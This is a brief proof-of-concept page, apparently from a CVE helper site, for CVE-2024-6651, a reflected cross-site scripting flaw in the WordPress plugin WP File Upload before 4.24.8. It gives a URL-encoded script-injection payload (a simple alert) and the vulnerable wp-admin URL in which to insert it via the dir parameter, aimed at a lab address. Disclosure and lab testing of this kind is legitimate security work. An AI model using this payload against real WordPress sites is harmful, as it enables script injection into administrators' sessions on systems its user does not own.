CVE-2024-6651 – CVE Helper

README.md

Rendering markdown...

POC / payload.txt TXT

⬇ Raw GitHub ✕ Close

CVE-2024-6651
WP File Upload (< 4.24.8) - Reflected XSS 

IP = "127.0.0.1" // YOUR IP LAB
PAYLOAD = "%22%3E%3Cscript%3Ealert%28%22Hello%22%29%3C%2Fscript%3E" // SIMPLE ALERT

VULN URL = 
http://<IP>/wp-admin/options-general.php?page=wordpress_file_upload&action=file_browser&dir=<PAYLOAD>

Author: yup-Ivan
Github: https://github.com/yup-Ivan/